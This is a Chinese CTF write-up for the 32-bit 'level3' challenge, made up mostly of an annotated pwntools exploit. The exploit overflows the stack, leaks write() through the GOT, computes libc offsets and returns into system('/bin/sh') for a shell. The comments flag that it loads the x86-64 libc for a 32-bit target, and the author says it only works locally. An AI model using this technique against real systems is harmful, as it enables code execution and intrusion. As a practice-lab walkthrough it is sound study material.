1.检查安全机制
2.IDA找敏感字符串(没找到),我们想到libc文件或许存在
我们利用 got 和 plt 的关系，可以获取到它的偏移地址，从而确定 system 的地址。
got表和plt:https://blog.csdn.net/qq_18661257/article/details/54694748
EXP
本地测试可以,提交不了
# Python 2 era script: `print` statements, str payloads and generator `.next()`
# are all Python 2 only; this does not run unchanged on Python 3 / pwntools 4.
from pwn import*
# The target is a 32-bit binary: every address is packed with p32 and the
# hard-coded function address is 0x0804844B.
p = process('./level3')
#p = remote("111.198.29.45"," 31727")
elf = ELF('./level3')
# NOTE(review): this is the x86-64 libc path, yet the target is 32-bit; the libc
# actually mapped into the process is the i386 build, whose symbol offsets differ
# from this file's. Confirm which libc the process maps before trusting `offset`
# below. The writeup also states the script only works locally: offsets taken
# from a local libc only hold where that exact libc build is running.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# PLT stub and GOT slot of write() in the binary. Using fixed addresses from the
# ELF presupposes no PIE (the checksec step in the writeup; confirm its output).
write_plt = elf.plt['write']
print "write:" + hex(write_plt)
write_got = elf.got['write']
print "write_got" + hex(write_got)
# File offsets of write() and system() inside libc -- not runtime addresses.
write_libc = libc.symbols['write']
print "write_libc" + hex(write_libc)
system_libc = libc.symbols['system']
print "system_libc" + hex(system_libc)
# Address the first payload returns to after the leak, so the overflow can be
# triggered a second time; presumably taken from IDA (see the writeup), not derived here.
vulnerable_function_addr = 0x804844B
# Drain whatever the program prints first.
p.recv()
# Stage 1 (ret2plt leak): 140 bytes of padding reach the saved return address
# (the 140 offset was established outside this script; a plain overflow like this
# also presupposes no stack canary). The return address becomes write@plt; the
# next dword is the address write() returns to (vulnerable_function_addr); then
# write's three arguments: write(1, write_got, 4) -- i.e. print the 4-byte GOT
# entry, which presumably already holds write()'s resolved libc address.
payload = 'A' * 140 + p32(write_plt) + p32(vulnerable_function_addr)
payload += p32(1)+ p32(write_got )+ p32(4)
p.sendline(payload)
# Read the leaked dword back (variable name typo kept as in the original).
wirte_addr = u32(p.recv(4))
print "write" + hex(wirte_addr)
pause()
# Runtime address minus file offset gives the libc load delta. Distances between
# symbols inside one libc mapping are fixed even under ASLR, so the same delta
# relocates system() and the "/bin/sh" string found in the libc file.
offset = wirte_addr - write_libc
system_addr = offset + system_libc
libc_bin_sh_addr = libc.search("/bin/sh").next()
bin_sh_addr = offset + libc_bin_sh_addr
print "bin_sh_addr " + hex(bin_sh_addr )
# Stage 2 (ret2libc): same padding, return into system(); the following dword is
# system()'s own return address, then its single argument, the "/bin/sh" pointer.
payload = 140 * 'A' + p32(system_addr) + p32(vulnerable_function_addr )
payload += p32(bin_sh_addr)
p.sendline(payload)
p.interactive()